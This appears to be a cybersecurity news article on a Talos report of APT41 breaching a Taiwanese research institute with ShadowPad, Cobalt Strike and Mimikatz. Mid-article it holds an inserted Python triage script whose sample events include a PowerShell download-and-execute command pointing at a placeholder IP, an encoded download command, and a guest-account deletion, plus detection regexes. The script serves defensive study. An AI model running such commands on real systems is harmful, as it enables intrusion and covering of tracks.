02 August 2024 | Ravi Lakshmanan | Cyber Espionage / Malware


A Taiwanese government-affiliated research institute that specializes in computing and related technologies was breached by nation-state threat actors with ties to China, according to new findings from Cisco Talos.

The unnamed organization was targeted as early as mid-July 2023 to deliver a variety of backdoor and post-compromise tools such as ShadowPad and Cobalt Strike. The activity has been attributed with medium confidence to a hacking group tracked as APT41.

“The ShadowPad malware used in the current campaign used an older vulnerable version of the Microsoft Office IME binary as a loader to load a custom second-stage loader to launch the payload,” said security researchers Joey Chen, Ashley Shen, and Vitor Ventura.


“The threat actor compromised three hosts in the targeted environment and was able to extract some documents from the network.”

Cisco Talos said it discovered the activity in August 2023 after detecting what it described as “unusual PowerShell commands” that connected to an IP address to download and execute PowerShell scripts within the compromised environment.

The initial access vector used in the attack is not known, although it involved the use of a web shell to maintain persistent access and drop additional payloads such as ShadowPad and Cobalt Strike, the latter delivered by means of a Go-based Cobalt Strike loader referred to as Avoid CS-killing.

“The Cobalt Strike malware was developed using an anti-AV loader to bypass AV detection and evade security product quarantine,” the researchers said.

Alternatively, the threat actor was observed running PowerShell commands to launch scripts responsible for executing ShadowPad in memory and retrieving the Cobalt Strike malware from a compromised command-and-control (C2) server. The DLL-based ShadowPad loader, also known as Skeeter bis, is executed by means of DLL sideloading.

Some of the other steps taken as part of the intrusion included using Mimikatz to extract passwords and executing several commands to gather information about user accounts, directory structures, and network configuration.

“APT41 made a suitable loader to install a proof-of-concept for CVE-2018-0824 directly in memory, using a remote code execution vulnerability to achieve local elevation of privilege,” Talos said, noting that the final payload, UnmarshalPwn, is released after passing through three different stages.

The cybersecurity company also identified the adversary’s attempts to evade detection by stopping its activity upon detection of other users on the system. “Once the backdoor is deployed the malicious actor will delete the web shell and the guest account that allowed the initial access,” the researchers said.
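Defender-side triage for two of the behaviours described above, the PowerShell commands that reach out to an IP address to download and execute scripts and the post-deployment deletion of the guest account, as an added Python example that is not code from the Talos report or this article. The process-creation records, host names and the 203.0.113.10 address are constructed samples, and the decoding of `-EncodedCommand` arguments goes slightly beyond the article by inspecting the wrapped script rather than only the wrapper.

```python
import base64
import re

# Constructed process-creation records (host, user, command line); illustrative samples only.
ENCODED_SAMPLE = base64.b64encode(
    "Invoke-WebRequest -Uri http://203.0.113.10/x -OutFile C:\\Windows\\Temp\\x.dll"
    .encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "guest", "cmd": "powershell.exe -nop -w hidden -c "
     "\"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')\""},
    {"host": "ws01", "user": "guest", "cmd": "powershell.exe -enc " + ENCODED_SAMPLE},
    {"host": "srv02", "user": "admin", "cmd": "net user Guest /delete"},
    {"host": "ws03", "user": "dev", "cmd": "powershell.exe -File C:\\build\\run_tests.ps1"},
]

# Behaviours to flag: remote fetch, in-memory execution, bare-IP URLs,
# base64-encoded command lines, and local account removal.
DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIWR\b|Net\.WebClient", re.I)
EXECUTE = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
ACCOUNT_DELETE = re.compile(r"\bnet1?\s+user\s+\S+\s+/del(?:ete)?\b|Remove-LocalUser", re.I)

def decode_encoded_command(cmd):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or invalid."""
    match = ENCODED.search(cmd)
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le") if match else None
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Return the finding labels raised by one command line, in a fixed order."""
    text, findings = event["cmd"], []
    decoded = decode_encoded_command(text)
    if decoded is not None:  # inspect the decoded script, not just the wrapper
        text += " " + decoded
        findings.append("encoded_command")
    if DOWNLOAD.search(text):
        findings.append("download")
        if EXECUTE.search(text):
            findings.append("download_and_execute")
    if RAW_IP_URL.search(text):
        findings.append("raw_ip_url")
    if ACCOUNT_DELETE.search(text):
        findings.append("local_account_deleted")
    return findings

def triage(events):
    """Keep only the events that raised at least one finding."""
    return [(e["host"], e["user"], f) for e in events if (f := classify(e))]
```

The findings are deliberately coarse labels so they can feed a correlation rule (for example, a download-and-execute followed by a local account deletion on the same host) rather than act as a standalone alert.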

The disclosure comes as Germany revealed earlier this week that Chinese state actors were behind a 2021 cyber attack on the country’s national mapping agency, the Federal Office of Cartography and Geodesy (BKG), for espionage purposes.

Responding to these allegations, the Chinese Embassy in Berlin said the accusation is unfounded and called on Germany to “stop using cyber security issues to discredit China politically and in the media.”
